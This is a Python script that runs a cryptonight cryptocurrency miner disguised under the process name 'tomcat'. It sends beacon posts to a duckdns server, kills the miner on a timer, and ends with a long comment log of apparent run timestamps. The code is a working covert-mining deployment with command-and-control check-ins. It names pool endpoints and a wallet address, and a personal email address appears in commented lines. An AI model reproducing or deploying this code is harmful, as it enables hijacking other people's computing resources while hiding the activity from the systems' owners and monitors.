import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:03.659823
#2018-02-17 16:19:04.165496
#2018-02-17 18:06:06.495756
#2018-02-17 19:53:05.151972
#2018-02-17 21:40:04.857689
#2018-02-17 23:24:04.548743
#2018-02-18 01:13:07.239375
#2018-02-18 02:59:06.738663
#2018-02-18 04:48:04.538414
#2018-02-18 06:38:06.805032
#2018-02-18 08:27:01.708354
#2018-02-18 10:14:05.864310
#2018-02-18 12:00:06.593611
#2018-02-18 13:44:05.914428
#2018-02-18 15:35:06.012255
#2018-02-18 17:23:07.493957
#2018-02-18 19:12:03.424233
#2018-02-18 20:58:05.815610
#2018-02-18 22:43:04.892098
#2018-02-19 00:32:07.300474
#2018-02-19 02:17:01.539854
#2018-02-19 04:04:05.786619
#2018-02-19 05:49:07.646265
#2018-02-19 07:38:03.794739
#2018-02-19 09:28:02.199235
#2018-02-19 11:17:05.899363
#2018-02-19 13:05:05.041583
#2018-02-19 14:53:03.817064
#2018-02-19 16:40:01.740053
#2018-02-19 18:26:07.198395
#2018-02-19 20:11:08.290789
#2018-02-19 22:02:05.183050
#2018-02-19 23:49:05.391258
#2018-02-20 01:35:08.152572
#2018-02-20 03:23:05.297554
#2018-02-20 05:09:07.537798
#2018-02-20 06:51:07.764551
#2018-02-20 08:38:02.125231
#2018-02-20 10:22:06.770383
#2018-02-20 12:07:05.049354
#2018-02-20 13:53:09.101738
#2018-02-20 15:38:08.686287
#2018-02-20 17:22:07.973004
#2018-02-20 19:12:06.966060
#2018-02-20 21:00:03.597134
#2018-02-20 22:44:09.293219
#2018-02-21 00:27:01.261576
#2018-02-21 02:14:08.728318
#2018-02-21 04:01:03.631589
#2018-02-21 05:48:05.144691
#2018-02-21 07:36:07.892258
#2018-02-21 09:21:04.456615
#2018-02-21 11:11:07.362515
#2018-02-21 12:58:04.322368
#2018-02-21 14:45:10.259195
#2018-02-21 16:31:13.013578
#2018-02-21 18:22:08.781448
#2018-02-21 20:07:08.796588
#2018-02-21 21:54:04.202228
#2018-02-21 23:42:06.505509
#2018-02-22 01:33:01.503100
#2018-02-22 03:20:08.066143
#2018-02-22 05:08:01.899833
#2018-02-22 06:51:03.736090
#2018-02-22 08:38:06.998627
#2018-02-22 10:25:06.629906
#2018-02-22 12:10:01.788878
#2018-02-22 13:55:06.758171
#2018-02-22 15:42:08.237440
#2018-02-22 17:27:01.273231
#2018-02-22 19:14:01.343823
#2018-02-22 21:06:07.811536
#2018-02-22 22:51:07.105095
#2018-02-23 00:38:09.319190
#2018-02-23 02:25:01.760313
#2018-02-23 04:14:01.544221
#2018-02-23 05:59:05.015284
#2018-02-23 07:33:07.092418
#2018-02-23 09:36:01.640959
#2018-02-23 11:40:11.522352
#2018-02-23 13:31:06.074348
#2018-02-23 15:17:06.199347
#2018-02-23 17:05:07.186364
#2018-02-23 18:54:02.153892
#2018-02-23 20:39:05.948225
#2018-02-23 22:25:08.031847
#2018-02-24 00:10:08.323307
#2018-02-24 02:03:05.285089
#2018-02-24 03:53:05.529252
#2018-02-24 05:40:02.824640
#2018-02-24 07:28:07.380417
#2018-02-24 09:16:04.061490
#2018-02-24 11:07:06.404737
#2018-02-24 12:56:01.290741
#2018-02-24 14:43:04.242641
#2018-02-24 16:34:04.947712
#2018-02-24 18:24:06.347207
#2018-02-24 20:11:04.563290
#2018-02-24 21:55:08.758322
#2018-02-25 00:56:05.356565
#2018-02-25 04:42:07.626618
#2018-02-25 08:42:01.726016